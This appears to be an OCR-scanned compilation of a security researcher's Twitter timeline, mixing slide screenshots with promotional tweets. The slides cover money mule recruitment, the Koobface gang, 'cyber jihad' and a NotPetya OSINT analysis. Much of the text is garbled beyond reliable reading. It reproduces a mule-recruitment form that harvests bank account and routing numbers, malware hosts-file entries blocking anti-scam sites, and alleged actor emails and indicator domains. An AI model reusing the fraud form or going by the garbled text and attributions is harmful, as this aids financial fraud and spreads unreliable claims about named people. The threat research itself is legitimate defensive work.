— Haye been in “business” for at least 6 months 


— At least One recommendation from two 
ybercri le-friendly Bommunities 


Fe a 100 pers 


https://t.co/JTcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/YgMOkSI4ir 


823 


What's itdike to bevatvioney Mule? 
(ISN 2 ROM 3 ESM « ROM s ) 


Why are you gathering so much mformation sbout applicants? Such sttentor especially to beek eccount details pets me oe guard 
ment, wh erator may 


v « at ary 
or © acess e by 8 financial menager the 
count. Otherwse, we risk to nts, n on. Analyzing all the details 


2 y to avord delays nhiie workung wt 
ccvrecy of enteres dete ls Please Se serous 


“Yew are respecaitie for reliability of this information. If you're having ary difficuites please contact your Sark. 


Banking Details 

Account Type" 

Benk Neme*: 

Account Type (checking/saving)*: 
Name on the Account* 

Accoum Mumber*: 


Routing Number for ACM transfer*: 


Routing Number for Federal Wire 
Transfer": 

Date you opered your Sank scrount*: 
How often do you use your bank 


eccount?® 


| Average smount of each cperation™: 


ts 8 a prepaid eccount?* 
| Daily withdranal limit over the 
counter* 
Have you ever used Western 
) Unon/Money Gran?" 


_ Ave there Money Gram offices in your 
2° 


area 


[weet step] back 
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https://t.co/JTIcqOaYgET #security #cybercrime #malware #cyberattacks 
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Protiling askey vendor of 
Standardized recrujtmenttemplates 


* Personal - 900$ 
= Website in English 
_ Comtespondence from the first answer till the output 


agreements, 


https://t.co/JTcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/qdZcz7UIBR 
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When the recruiters/go malicious 


Sprott Asset Management is offering an 
executable.SSL Certificate, which blocks access to 
Sites profiling Moncy mule recruitment campaigns. 


The HOSTS file was updated with the following URL-to-IP mappings: 


1 wwe. bobbear.co.uk 
0.1 bobbear.co.uk 
-i1 reed.co.uk 
0.2 seek.com.au 
1 scam.com 
0.1 scambusters.org 
i www.guardian.co.uk 
maddanchey blogspot 


https://t.co/JTcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/dcPVGcPGNz 


Responses to mullerecruitment 


* Currently favorable conditions 


= Lack@f,mass acc Spieny of virtual currency, allowing 
good Old fashioned “follow the money” techniques 


Active lid mules/victims are the best source of raw 


| at ti zing an inventory Offbank accounts, and 
rs erated by LE in order to infiltrate and 


I 5 sh \S S infrastructure allowing real-time 
s that haven't even been 


” Corton 4 
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Cyber Jihad vs Cyberterrorism — Separating Hype 
from Reality 


Dancho Danchev 


Cybercrime Researcher, Security Blogger at ZDNet, 
Security Blogger at Webroot Inc. 
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https://t.co/JTcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/QLJUI5gvcS 


Presentation Outline 


. Cyber Jihad VS Cyberterrorism — the basics 
. Introduction to Cyber Jihad 
. The current state of the Cyber Jihad threat 


. The hacking tools and tactics used by Cyber 
Jihadists to support cyber operations 


. Real life cases of Cyber Jihadists' cyber 
operations in action 


RSACONFERENCE _"4— 
EVROPE 2012 


< _ 
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https://t.co/JTcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/ghW2pODzNp 


Overview of Cyber Jihadists' Literature 


. The Technical Mujahid Magazine 
. Cyber Jihadist's Encyclopedia 

. Mujahideen Harvest Magazine 

. INSPIRE Magazine 


RSACONFERENCE _“4— 
EUROF 012 


oe a 


828 


02:39 


https://t.co/JTcqOaYgET #security #cybercrime #malware #cyberattacks 
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The Technical Mujahid Magazine 
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Famous Cyber Jihadist Cases 


Irhabi007- caught and prosecuted 
. Jihad Jane — caught and prosecuted 
. GIMF members — caught and prosecuted 


RSACONFERENCE 
2012 


EUROPE 
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Real life Cyber Jihadist Cyber Operations 


. Al-Jinan's Electronic Jinad DoS Campaign 


. Distribution of anti-infidel DIY Denial of Service 
Tools 


- Muslims United Cyber DoS Campaign 


RSACONFERENCE 
EUROPE 2012 
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Case study on GIMF 
. First spotted in 2006 — released the “Night of 
Bush Capturing 


. Releases the “Mujahideen Secrets Encryption 
Tool’ 


. Used primarily WordPress.com for hosting 
. Relied on Archive.org for video hosting 
. Abuse campaign to expose their social network 
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Case study on GIMF 


Arty Sprmoisio RIA Kops 


File Stwedder ) L Recoient IO Reciotent User ID 
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Syemetnec Cipher Aljonthe Steathy Cipher 
Options ) Piped wth 255 be key (AES) + W Activate Steatiy Cotes fA 
PA ) Rane Fie to Snecpet 
2 Dement: ond beter 


Petree eshieg EME ASAD PGP. bog > Sehet 


[> Wipe Out Degeuel Fie [Pecmeneet ide deletion lor ncresced eeouty) 


Select Fle to Deceyot 


& Seket 


Compresmcn: 765.2% Opher: Mars. Kay sze: 255 
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Top 5 Most Popular Cyberterrorism Myths 


Cyberterrorists actively plot to take down the Grid 
Cyberterrorists exclusively use steganography 
Cyberterrorists poses sophisticated hacking skills 
Cyberterrorists use bullet-proof hosting services 


Cyberterrorists have access to good 
programmers with software engineering degrees 
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[Who's Behind It?] 


« Profiling the Koobface Gang — A Russian-Based 
Cybercrime-facilitating Group 


le 


— KrotReal — active team member of Ali Baba and 40 
cybercrime-friendly group 


— Two years active investigation 
¢ Active community and ISP collaboration 
¢ Active botnet infrastructure monitoring 


¢ Multiple C&C server domains registered to 
typosquatted Dancho Danchev = 
iat 


« Active C&C server domains take down ad 
hh 


A 
S 
ic+incibe ‘ * - 


https://t.co/JIcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/rxhhuOnAWG 
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[Who's Behind It?] ee 
e Active C&C server infrastructure monitoring and take 
down efforts 


¢ 24 hours period of time for active C&C server take 
down 


¢ Coordinated take down campaign across multiple 
ISPs including hosting providers 


* Koobface Gang to UKSERVERS-MNT - “we've 
been compromised” 


« Koobface 1.0 goes Koobface 2.0-— social = 
engineering, and ISP cooperation goes rogue 


7 np 
« Os FF «@ 
= f = +. ~ 
ice incibe 2 * bj 9 
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: A 
[Who's Behind It?] = 
e The gang is experimenting with alternative propagation 
strategies, such as for instance Skype 


* Koobface Gang: strange error. there're no 
experiments on that 


e The gang is monetizing traffic through the Crusade 
Affiliates scareware network 


* Koobface Gang: maybe. not 100% sure 


. a 
PS | ») # a 
fet s a  - e 
ice incibe ® a * 4° 
= @ 13 


https://t.co/JTcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/iu7fOcZqIV 


A 


[Koobface Gang's Malicious Activity - = 
Exposed] 


e« Scareware-serving Campaigns 


¢ Black hat SEO (search engine optimization) utilized 
for traffic acquisition 


¢ Social media propagation utilized for traffic 
acquisition 


« Bahama botnet connection 


¢« NYTimes malvertising campaign 7 
« Scareware-serving campaigns primarily sefved 
fake Adobe Flash Players and YouTube players ° 
: :" = 2 
incibe % * 


18 - Saturday 


04:02 


04:02 


04:02 


04:02 


04:03 


04:04 
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My latest report for @whoisxmlapi. Enjoy! https://t.co/CiB3VP4teA 


My latest report for @whoisxmlapi. Enjoy! https://t.co/EixthIBT2D 


My latest report for @whoisxmlapi. Enjoy! https://t.co/9ZebMvlJ9P 


My latest report for @whoisxmlapi. Enjoy! https://t.co/vKqwfNKFTm 


My latest report for @whoisxmlapi. Enjoy! https://t.co/nEiH4X57Ml 


My latest report for @whoisxmlapi. Enjoy! https://t.co/51xVXaxeWe 


04:04 
My latest report for @whoisxmlapi. Enjoy! https://t.co/ExBPWp9II9 


*1 
04:04 

My latest report for @whoisxmlapi. Enjoy! https://t.co/JkOGIgzxOG 
04:04 

My latest report for @whoisxmlapi. Enjoy! https://t.co/qg9KIAOOh7t 
11:25 


How to Take Down the Conti Ransomware Gang - A Practical And Relevant Case Study 
on Taking Down Cybercriminal Infrastructure - A Practical Example - 
https://t.co/sgy3sdvc3e #ThreatHunting #Threatintel #Threatintelligence 
https://t.co/Ovg4nFqYk4 


22 *%2 


19 - Sunday 


09:02 


https://t.co/OmUajr8DT8 #security #cybercrime #malware #CyberSecurity 
#cybersecuritytips #cyberwar #CyberSecurityAwareness #Threatintelligence 
#threatintel https://t.co/Z7 7megoyyL 


21 ¥*1 


Free Maltego-Compatible 
STIX/STIX2/TAXII Threat 
Intelligence Feed 


port 
ble | hreat 
LhreatConnect, 
ArcSight, Microsoft 
suMO LOGIC, arsky Cyberlrace,ServiceNow 
CheckPoint ThreatCloud, C: mn Black EDR, ¢ of ail Gateway, T hreatConnect 


I gPoint Ta Symantec, | akhythm, »x, Cloudera 


09:12 
https://t.co/JTcqOaYgET #Threatintelligence #threatintel https://t.co/WaADDIDZc 


Table 9: Quality of selected intelligence sources (10 out of 45) 


% of % ol % of © 0 
Blog covered covered timely robust 
10Cs iocterms 10Cs 10Cs 
2% 29 14% 
559 54% 


Dancho Danchev 42% 84% 
Naked Security 43% 45% 
THN 38% 51% 
Webroot 54% 3% 84% 
ThreatPost 26% 379 52% 29% 
TaoSecurity 57% Re 31% 68% 
Sucuri 44% 35% 3% 52% 
PaloAlto 39% Ne Ne 87% 
Malwarebytes 32% Ne 26% 72% 
Hexacom 49% ‘ 76% 


20 - Monday 


22:27 


Dear @Cryptome_org - | just send you an email. | hope that you'll find some time to 
go through it and feature the content on https://t.co/ZMA8wpFhvl. Thanks a lot for 
featuring my memoir which | hope will be extremely useful and informative for your 
readers. 
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22 - Wednesday 


01:04 


My latest white paper for @whoisxmlapi - https://t.co/uvLZNkbnBd #security 
#cybercrime #malware #Threatintelligence #Threatintel #threathunting 


23 - Thursday 


09:20 


Discussing the #Ransomware FUD Wars - An Analysis - https://t.co/sOJOggxYor 
#security #cybercrime #malware #CyberAttack #CyberSecurity #threathunting 
#threatintelligence https://t.co/XL2Cy6gRf6 


09:23 


Oops. Looks like | did it again (https://t.co/eole2CdhmD) - check this out - I’m on 
https://t.co/ZMA8wpFhvIl! - Part Two - https://t.co/UvbvQI9z6Z - here’s the original link 
- https://t.co/TjmRcmohtj #security #cybercrime #malware #threatintelligence 
https://t.co/yvsGgdldzA 


839 


Dancho Danchev's Blog - Compilation Archive 

hitps://archive org/download dancho-danchev-blog-e-book/ Dancho Danchev Blog E-Book zip 
Dancho Danchev's Security Research for Webroot circa 2012-2014 

Dancho Danchev Security Research ZDNet Zero Day Blog 


hitps.//archive org/download dancho-danchev-secunty-research-zdnet-zero-day- 
blog/Dancho Danchev Security Research ZDNet Zero Day Blog. pdf 


Dancho Danchev's Offensive Cyber Warfare Articles for Unit-123 


hitps.//1a801701 us archive ore/1$. items dancho-danchey-offensive-cwber-warfare-unit- 
122-Dancho_Danchey Offensive Cyber Warfare Unit-123 pdf 


Dancho Danchev's Security Research Compilation 

bitps://12801705 us archive. org/32/items dancho-danchev-security-research Dancho_Danchev Security Research pdf 

Dancho Danchev's “Assessing The Computer Network Operation (CNO) Capabilities of the Islamic Republic of Iran” - Report 
hips. archive org download iran 20210109 Tran rar 


Dancho Danchev’s "A Qualitative and Technical Collection OSINT-Enniched Analysis of the Iranian Hacking Scene Through the Prism of 
the Infamous Ashivane Digital Security Team" Report 


Dancho Danchev’s Astalavista Security Group Security Newsletter 2003-2006 


hitps:/ia601 $08 us archive ore/13 items astalavista-security-group-security-newsletter-2003- 
2006/Astalavista. Secunty_ Group Security Newsletter 2003-2006 pdf 


Dancho Danchev's "Building and Implementing a Successful Information Security Policy” Security Publication 

bitps.//archive org download ‘secunty-policy, security-policy. pdf 

Dancho Danchev's Keynote at CyberCamp 2016 - Exposing Koobface - The World's Largest Botnet - Video 

hitps. archive ore download kevnote-exposing-koobface-dancho-danchey Keynote Exposing Koobface Dancho Danchev.mp4 


110 


Takes you back doesn’t it? - "Interview with Dancho Danchev" circa 2011 - 
https://t.co/gwMRy031zU courtesy of @Malwarelnfosec. Hey. | was a teenager back 
then therefore thanks for the interview request. Stay tuned! 


11:15 


Here we go! - https://t.co/WIBGTU5ryT If it’s going to be massive it better be good. 
Grab an account today and show your support. In exchange I'll do my best to dazzle 
you with my cybercrime research and threat intelligence research "Know-how". Stay 

tuned! https://t.co/UwAA6vGgzv 
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OG IN MEMBERSHIP ACCOUNT NEWSLETTER PREMIUM THREAT INTELUGENCE PRODUCT - “CYBER INTELLIGENCE” MEMO - [PDF] - DXRECT DOWNLOAD Ay; 
PREMIUM THREAT LUGENCE PROULICT - * G . c ANON” - CIRECT DOWNLOAD ~ 70GB - [RAR] 
PREMIUM THREAT INTELUGENCE PRODUCT - CYRERCEIME FORUM DATA SET 20271 - 98G8 - DERECT DOWNLO RAR} 
PREMIUM THREAT INTRLUGENCE PRODUCT ~ DANCHD DANCHEWS BLOG ~ FULL OFFLINE D-800K FORMAT COPY ~ 6GH ~ DERECT DOWNLOAD AVARARLD 
Peco AT INTELUGINGE PROL LM HACKED SONAL WER 5 ac FULL RACK = 2071 ~ PART TWO ~ DORDCT DOWNLOAL 
PREMIUM THREAT INTELUGENGE PRODUCT ~ PORSOMALLY CYSER T ‘ iS ~ A COMPILATION ~ (Par) T DOWMLOAD 


PREMIUM THREAT INTELUGENCE PRODUCT ~ IRAN HACKERS PERSONAL WEB SITES REPOSITO CARECT DOWMLOAD 


— 


= 


Offensive Warfare 2.0 - The Web's Primary Cybercrime Research OSINT And Threat Intelligence Central Clearing 
House 


Dancho Dancher ts the work's leading expert in the fekd of cyberctime fighting and threat intelligence gathering having actively pioneered his own methodlogy for procentts 
leacting to @ successful set of hundress of Pagt~quality acunpis act research a:tiches published at Ube industry's beating Uweat intelgence biog - ZDMet's Zero Day Du 
Infoemation Security Knowledge and Webroot's Threat Hog wath his research featured im Tectuseme, ZDNet, CNN, PCWorld, SCMagazine, TheRegister NYTimes, CHET, Computerworld, H»Magazine currently 
produciag threat intelligence at the industry's leading threat intelligence blog ~ Dancho Danchev’s - Mind Streams of Information Security Knowledge With his research featured at RSA Burope, 
‘CyberCamp, InfoSec, GCHO and Interpol the researcher continues to actively produce threat intelligence at the industry's leading threat intelligence blog - Dancho Danchev’s - Mind Streams of 
Information Security Knowledge publishing a diverse set of hundreds of high-quality research analysers detailing the malicious and fraudulent activites at nation-state and malicious actors across Une 
@lobe 15 Years of Actionable and Never-Pubisihed Actionable Threat Actor Specific Threat libgence ~ STIX/STIX2/TAXIE and Maitego Transforms Compatibte information Exports and Dwect Download 
Available API Key Integration Possitte With EventLog Analyrer, ThreatConnect, Azure Sentinel, Sptunk, Cisco, Elemendar, Cortex XSOAR, TrendMicro, AscSigh, Microsoft Sentinel, EventTracker, Piioer 
Scrutinizer, Sumo Logic. Kaspersky CyberTrace, Servicelow, CheckPotet ThrestCloud, Carbon Black EDR Cisco Email Gateway ThrestConnect, LogPotnt, Tantum, Symantec, LogRhythm, Infotdax, Clasdera 
On @ daddy tests we offer unique and nowel research and anadgis including loCs (Indicators of Compromise) and TTPs (Tactics Techriques and Procederes) in Une following categories Malware, Cyber 
Jihad, Cyber Terreetsm, Thweat Actors, Phishing, Spam, IM malware, Mobile Malware, Mac OS X Malware, Android Mahware, Blackhat SEO, Fraud, Money Mule Recrufiment, Reshipping Mule Recruitment, 
Malvertising, Ransomware, Scareware He's also a founder and Chief Executive Officer at Stealth Startup, Cybercrime Researcher working under NDAs/CDAs/PLAs, DIGS Threat Researcher at WhotisXMlL 
APLHi spectalties inchade Cyber Inteligence, Cyoer Threat intelligence, Cyber Counter Threat intelligence. CYEERINT, CSINT, “Real life” personalization of network assets, Mullifacetad perspectives on 
Cybercrime incidents/qrovpn/Traudaient schemesm, Anticipation of emerging fraudulent models, In-depth understanding of monetizaton strategies within the cybercrime ecouptem, 
Communicating/Presenting haedcore technical material/reseasch findings Lo a averse set of muciences His key achievements include presented at the OCHO with the Honeynet Project, SCMagazine 
Who to Follow on Twitter for 201) participated im a chet. GCHQ Progeam called “Lovely Horse”, identified a major victim of the SolarwWinds Attack ~ PaloAltoNetworks, found malware on the Web 
Site of Mashpoint, tracked monitored and profiled the Kootface Botnet and exposed one botnet operatce, mace it to Slashdot two times, my personal blog got SOM Page views since December 2005, my 
Old Twitter account got 11,000 followers, I hac an average of 7000 HSS readers on my blog. | have my cum ving! “Wue Sabbath Mack Cheer tefer ~ We Hate You Dancho Danchey” made by s Canacian 
arlit, Carrently fumning Astalavista box sk, I gave am interview to Dw on the Koobface Botnet, | gave an interview Lo NYTimes on Une Keobface botnet, | gave an imerview to Russian OSINT, Mivted as a 
by Jeffrey Carr's Taia Global, presented at the GCHQ presented a interpol, presented at InfoSec, presented at CyberCamp, presented at RSA Europe 


19251 


Who wants direct download access to my Cybercrime Forum Data Set for 2021? - 
https://t.co/rgsEandTx7 Empower yourself and your organization with a fresh set of 
situational awareness on the bad guys. #Threatintelligence #threathunting 
#threatintel https://t.co/pA8CK9QAbE 


*1 
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24 - Friday 


05:08 


842 


https://t.co/I8IN78UTpe https://t.co/nv3i5PTYOX 


05:09 


https://t.co/rgsEandTx7 https://t.co/QLIO3d202t 


843 


07:35 


https://t.co/Z2Q6Hu2ChC https://t.co/ka6fHmUFLi 


844 


10:43 


https://t.co/5dxYcYc8WH #security #cybercrime #malware #CyberAttack 
#CyberSecurity #cyberattacks #CyberSec #CyberWarrior #Threatintelligence 
#Threatintel #threathunting https://t.co/ga6WHsIUbO 


Offensive Warfare 2.0 - The Web's Primary Cybererime Research OSINT And Threat Intelligence Central Clearing 
House 
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26 - Sunday 


13:34 


Who wants to fight some bad guys? - https://t.co/jSWJyvWCRp #security 
#cybercrime #malware #CyberSecurity #cyberattacks #cybersecuritytips 
#threatintelligence #threatintel https://t.co/PeoxU6A6Eu 


21 %1 
% of % of % of % of 
Blog covered covered timely robust 
10Cs iocterms 10Cs IOCs 
Dancho Danchev 42% 62% 14% 84% 
Naked Security 43% 55% 54% 45% 
THN 38% 38% 41% 51% 
Webroot 54% 719% 13% 84% 
ThreatPost 26% 37% 52% 29% 
TaoSecurity 57% 61% 31% 68% 
Sucuri 34% 35% 43% 52% 
PaloAlto 39% 44% 15% 87% 
Malwarebytes 32% 48% 26% 712% 
Hexacorn 49% 57% 59% 76% 
13:35 


Who wants to fight some bad guys? - Part Two - https://t.co/IdtkK350v1G #security 
#cybercrime #malware #CyberSecurity #cyberattacks #cybersecuritytips 
#threatintelligence #threatintel https://t.co/sObXN39SSX 


21 *1 
% of % of % of % of 
Blog covered covered timely robust 
IOCs iocterms IOCs IOCs 
Dancho Danchev 42% 62% 14% 84% 
Naked Security 43% 55% 54% 45% 
THN 38% 38% 41% 51% 
Webroot 54% 719% 13% 84% 
ThreatPost 26% 37% 52% 29% 
TaoSecurity 57% 61% 31% 68% 
Sucuri 34% 35% 43% 52% 
PaloAlto 39% 44% 15% 87% 
Malwarebytes 32% 48% 26% 72% 
Hexacorn 49% 57% 59% 76% 
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13:36 


Who wants to fight some bad guys? - Part Three - https://t.co/NgagnW1xeC 
https://t.co/NgagnW1xeC #security #cybercrime #malware #CyberSecurity 
#cyberattacks #cybersecuritytips #threatintelligence #threatintel 
https://t.co/xbAoM3cAn0 


21 *l1 
% of % of % of % of 
Blog covered covered timely robust 
IOCs iocterms IOCs IOCs 
Dancho Danchev 42% 62% 14% 84% 
Naked Security 43% 55% 54% 45% 
THN 38% 38% 41% 51% 
Webroot 54% 79% 13% 84% 
ThreatPost 26% 37% 52% 29% 
TaoSecurity 57% 61% 31% 68% 
Sucuri 34% 35% 43% 52% 
PaloAlto 39% 44% 15% 87 % 
Malwarebytes 32% 48% 26% 72% 
Hexacorn 49% 57% 59% 76% 


13:37 


Who wants to fight some bad guys? - Part Four - https://t.co/VtdZPbVqmb #security 
#cybercrime #malware #CyberSecurity #cyberattacks #cybersecuritytips 
#threatintelligence #threatintel https://t.co/kcnWOuWg2n 


21 %*1 
% of % of % of % of 
Blog covered covered timely robust 
IOCs iocterms IOCs 10Cs 
Dancho Danchev 42% 62% 14% 84% 
Naked Security 43% 55% 54% 45% 
THN 38% 38% 41% 51% 
Webroot 54% 719% 13% 84% 
ThreatPost 26% 37% 52% 29% 
TaoSecurity 57% 61% 31% 68% 
Sucuri 34% 35% 43% 52% 
PaloAlto 39% 44% 15% 87% 
Malwarebytes 32% 48% 26% 72% 
Hexacorn 49% 57% 59% 76% 
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13:37 


Who wants to fight some bad guys? - Part Five - https://t.co/7Ro2JFDm8y #security 
#cybercrime #malware #CyberSecurity #cyberattacks #cybersecuritytips 
#threatintelligence #threatintel https://t.co/FqhUSpCDas 


21 *1 
% ot % of % of % of 
Blog covered covered timely robust 
IOCs iocterms IOCs IOCs 
Dancho Danchev 42% 62% 14% 84% 
Naked Security 43% 55% 54% 45% 
THN 38% 38% 41% 51% 
Webroot 54% 79% 13% 84% 
ThreatPost 26% 37% 52% 29% 
TaoSecurity 57% 61% 31% 68% 
Sucuri 34% 35% 43% 52% 
PaloAlto 39% 44% 15% 87% 
Malwarebytes 32% 48 % 26% 72% 
Hexacorn 49% 57% 59% 76% 
13:38 


Who wants to fight some bad guys? - Part Six - https://t.co/amDclOAEcg #security 
#cybercrime #malware #CyberSecurity #cyberattacks #cybersecuritytips 
#threatintelligence #threatintel https://t.co/qGxHPMvBNc 


=1-%1 

% of % of % of % of 

Blog covered covered timely robust 
IOCs iocterms IOCs IOCs 
Dancho Danchev 42% 62% 14% 84% 
Naked Security 43% 55% 54% 45% 
THN 38% 38% 41% 51% 
Webroot 54% 719% 13% 84% 
ThreatPost 26% 37% 52% 29% 
TaoSecurity 57% 61% 31% 68% 
Sucuri 34% 35% 43% 52% 
PaloAlto 39% 44% 15% 87% 
Malwarebytes 32% 48% 26% 72% 
Hexacorn 49% 57% 59% 76% 
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13:39 


Who wants to fight some bad guys? - Part Seven - https://t.co/SMDjSd2Jnb #security 
#cybercrime #malware #CyberSecurity #cyberattacks #cybersecuritytips 
#threatintelligence #threatintel https://t.co/aZgx9lIOm0x 


22 %*%5 
% of % of % of % of 
Blog covered covered timely robust 
10Cs iocterms IOCs IOCs 
Dancho Danchev 42% 62% 14% 84% 
Naked Security 43% 55% 54% 45% 
THN 38% 38% 41% 51% 
Webroot 54% 719% 13% 84% 
ThreatPost 26% 37% 52% 29% 
TaoSecurity 57% 61% 31% 68% 
Sucuri 34% 35% 43% 52% 
PaloAlto 39% 44% 15% 87% 
Malwarebytes 32% 48% 26% 72% 
Hexacorn 49% 57% 59% 76% 
13:40 


Thanks for the RT! @DaveMarcus Keep it up! #security #cybercrime #malware 
#CyberSecurity #cyberattacks #cybersecuritytips #threatintelligence #threatintel 


21 %1 
14:09 
@DaveMarcus Catch up! Catch up! - https://t.co/JTcqOaYgET | 
https://t.co/OmUajr8DT8 | https://t.co/sMWCGUWR6g | https://t.co/ZOwWW9r2oiV | 
https://t.co/eufoOwGUnb | https://t.co/nNsSXMPrGi0 | https://t.co/7GM1oNelIFK | 
https://t.co/uvAt5gK9BA | https://t.co/UZ6qVANXVF 


*1 
14:11 


Thanks for the RT! - @thierryzoller Keep up the good work! 


*1 
19:20 
Exclusive! - "Exposing GRU’s Unit 74455 "NotPetya" Malware Gang - An OSINT 
Analysis" - https://t.co/iEF7ysEg8F #security #cybercrime #malware #CyberSecurity 
#cyberattacks #cybersecuritytips #Threatintelligence #threatintel 


213 *28 
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27 - Monday 


03:31 
@BushidoToken Psst! - https://t.co/oF82LfFNgE Here a link to the PDF - 
https://t.co/iEF7ysEg8F Enjoy! 
03:34 
@campuscodi Check this out! - https://t.co/oF82LfFNgE Here’s the PDF - 
https://t.co/iEF 7 ysEg8F Enjoy! 
03:38 


RT pls! - "Exposing GRU’s Unit 74455 "NotPetya" Malware Gang - An OSINT Analysis" - 
https://t.co/iEF7ysEg8F #security #cybercrime #malware #CyberSecurity 
#cyberattacks #threatintel Here’s the original post - https://t.co/oF82LfFNgE Enjoy! 


21 *2 
03:51 
@NCSCgov Hello. Here’s my analysis - https://t.co/oF82LfFNgE and here’s the actual 
PDF of the campaign - https://t.co/iEF7ysEg8F Enjoy! 
03:51 
@a_greenberg Andy. Here’s my analysis - https://t.co/oF82LfFNgE and here’s the 
actual PDF of the campaign - https://t.co/iEF7 ysEg8F Enjoy! 
03:52 
@ESETresearch Hello. Here’s my analysis - https://t.co/oF82LfFNgE and here’s the 
actual PDF of the campaign - https://t.co/iEF7ysEg8F Enjoy! 
03:52 
@dnvolz Hello. Here’s my analysis - https://t.co/oF82LfFNgE and here’s the actual 
PDF of the campaign - https://t.co/iEF7ysEg8F Enjoy! 
03:52 
@jseldin @USTreasury Hello. Here’s my analysis - https://t.co/oF82LfFNgE and here’s 
the actual PDF of the campaign - https://t.co/iEF7 ysEg8F Enjoy! 
03:58 


Exposing GRU’s Unit 74455 "NotPetya" Malware Gang - An OSINT Analysis - 
https://t.co/iEF 7ysEg8F [PDF] Original analysis here - https://t.co/oF82LfFNgE 
#security #cybercrime #malware #cyberattacks #cybersecuritytips 
#ThreatDetection #threatintel https://t.co/viQ8VZKSn9 
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03:58 


Exposing GRU’s Unit 74455 "NotPetya" Malware Gang - An OSINT Analysis - 
https://t.co/iEF7ysEg8F [PDF] Original analysis here - https://t.co/oF82LfFNqE 
#security #cybercrime #malware #cyberattacks #cybersecuritytips 
#ThreatDetection #threatintel https://t.co/LHzIljgOEn 


2 


03:59 


Exposing GRU’s Unit 74455 "NotPetya" Malware Gang - An OSINT Analysis - 
https://t.co/iEF 7ysEg8F [PDF] Original analysis here - https://t.co/oF82LfFNgE 
#security #cybercrime #malware #cyberattacks #cybersecuritytips 
#ThreatDetection #threatintel https://t.co/NESZdb6jKp 
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03:59 


Exposing GRU’s Unit 74455 "NotPetya" Malware Gang - An OSINT Analysis - 
https://t.co/iEF7ysEg8F [PDF] Original analysis here - https://t.co/oF82LfFNqE 
#security #cybercrime #malware #cyberattacks #cybersecuritytips 
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#ThreatDetection #threatintel https://t.co/C60oALiIDhTQ 


*1 
dr.x@europe.com 
Zan) Zany 
@®) @®) 
socks.pm autoupdater.biz 
03:59 
Exposing GRU’s Unit 74455 "NotPetya" Malware Gang - An OSINT Analysis - 
https://t.co/iEF7 ysEg8F [PDF] Original analysis here - https://t.co/oF82LfFNgE 
#security #cybercrime #malware #cyberattacks #cybersecuritytips 
#ThreatDetection #threatintel https://t.co/NzYcoGyD1H 
*1 


@ @ 


am andabuilderam a@m ail.com presmike2034@msn.com 


® 


m inisternetwork.org 
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03:59 


Exposing GRU’s Unit 74455 "NotPetya" Malware Gang - An OSINT Analysis - 
https://t.co/iEF 7ysEg8F [PDF] Original analysis here - https://t.co/oF82LfFNgE 
#security #cybercrime #malware #cyberattacks #cybersecuritytips 
#ThreatDetection #threatintel https://t.co/d13q9FMs36 


*1 
contact_r.zeteny@keem ail.me 
7 iis 
Ss) ed 
um 10eset.net as23-updater-sym antec.org 
07:18 


Shots from the Wild West - Random Cybercrime Ecosystem Screenshots 2021 - An 
OSINT Analysis - https://t.co/ZWqUX501GK #security #cybercrime #malware 
#CyberAttack #CyberSecurity #cybersecuritytips #ThreatHunting #Threatintel 
#ThreatDetection 


07:18 


Shots from the Wild West - Sample Compilation of RATs (Remote Access Tools) and 
Trojan Horses Screenshots - An OSINT Analysis - https://t.co/ZqPPhotnDD #security 
#cybercrime #malware #cybersecuritytips #ThreatHunting #Threatintel 
#ThreatDetection 


08:09 
@mikko My take on the incident - https://t.co/oF82LfFNqE PDF analysis here - 
https://t.co/iEF 7 ysEg8F 
09:25 


Anyone hiring in Europe? Here’s my CV - https://t.co/04zpbx2RSb and here’s the 
original post - https://t.co/GrQah7NmDP #security #cybercrime #malware 
#ThreatHunting #Threatintel #threatintelligence 


12:04 
Exposing an Indian Police Spyware Cyber Operation that Fabricated Evidence on the 
854 


PCs of Indian Activists - An OSINT Enrichment Analysis - https://t.co/qifV9RLH4A 


#security #cybercrime #malware #ThreatHunting #Threatintelligence CC: 
@a_greenberg 
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28 - Tuesday 
08:41 


https://t.co/AZAws4uoos #security #cybercrime #malware #Threatintelligence 


#Threatintel #threathunting 


29 - Wednesday 
09:28 


Who's online interested and has the threat intelligence OSINT and cyber threat actor 
attribution experience and the necessary time including SharePoint and Microsoft 
Access experience and wants to work with me on a collaborative database of bad 

guys? https://t.co/QRzhOrMp3} 


21 %1 


| Global Intelligence 
Ee Web Site Defacements 
Group Name 
Hacker Handle 
Official Defacer Web Site 
Compromised Site URL 
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a ae 
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09:30 


What we need is a set of experienced and knowledgeable folks to work with me that 
also can dedicate free time for the project to discuss and build the initial taxonomy 
for the project. Don’t forget the beer will be on me when we go public with the 
project. https://t.co/6hbtRXRdUK 
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09:33 


Anyone who’s into OSINT on the bad guys including threat intelligence and threat 
actor attribution and has free time can DM me or drop me a line at 
dancho.danchev@hush.com to discuss and work on the actual data entry and the 
initial taxonomy. https://t.co/uBHcO66U6z 
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| Affected Company 
(| Affected Country 
=. || Mahwere 
|| Malware Name 
|| Malware Descnption 
|| Malware Author 
|C|| Malware Group 
[7] MDS 
IC'| SHA256 
|-’| Command and Control 
= Tropns 
|| Leaf 
[| Leaf 
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Command and Control 


Cancel | 


ae 


[___Help 


What we need at the beginning is experienced folks who can work on the taxonomy 
and at a later stage the actual data entry work in everyone’s free time. Are you 
interested? DM me or drop me a line at dancho.danchev@hush.com Let’s make it 
happen! https://t.co/teQ9vsTNUNV 
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09:38 


| just grabbed Microsoft Access and SharePoint access and | hope that you can 
dedicate the time to assist in the initial taxonomy development and then the actual 
data entry in your free time. RT pls or DM or drop me a line at 
dancho.danchev@hush.com. https://t.co/3pYeGN2fzP 
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|__Help 


| envision this as a Windows Application with daily or weekly updates where we can 
eventually introduce an API and let other users use and enrich our information in 


their research. RT pls DM or drop me a line at dancho.danchev@hush.com 
https://t.co/bWfy53UBce 
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10:30 


My latest white paper for @whoisxmlapi - https://t.co/uvLZNkbnBd #Threatintel 
#threathunting 


*1 
11:42 


Dear @MalwarePatrol what’s the easiest way to send you an email or can you DM me 
here? Regards. Dancho 
18:07 


